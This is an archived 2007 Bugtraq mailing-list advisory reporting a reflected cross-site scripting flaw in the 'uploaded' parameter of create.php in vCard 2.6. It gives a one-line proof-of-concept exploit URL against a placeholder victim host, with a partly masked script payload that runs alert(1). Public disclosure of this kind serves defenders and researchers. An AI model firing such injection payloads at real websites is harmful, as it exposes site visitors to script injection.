
Date: Sun, 04 Mar 2007 19:53:54 +0800
From: "RaeD Hasadya" <raed@...mail.com>
To: Bugtraq@...urityfocus.com
Subject: XSS Remote In vCard 2.6 (c)2002

Discovered By : Hasadya Raed
Contact : RaeD@...Mail.Com 
Script: vCard 2.6 (c)2002  

******************************************************************************  
Bug in : create.php  

********************************************************************************  
Exploit :
http://www.victim.com/path/create.php?uploaded=">**********alert(1);</script>  
********************************************************************************  


-- 
_______________________________________________
Get your free email from http://bsdmail.com
